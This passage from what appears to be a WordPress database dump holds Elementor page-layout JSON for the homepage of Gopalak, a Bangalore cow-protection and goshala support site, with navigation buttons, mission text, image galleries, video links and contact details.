us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":100},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9738,1639,'_elementor_page_assets','a:0:{}'),(9739,1640,'_elementor_edit_mode','builder'),(9740,1640,'_elementor_template_type','wp-page'),(9741,1640,'_elementor_version','3.7.8'),(9742,1640,'_wp_page_template','elementor_canvas'),(9743,1640,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 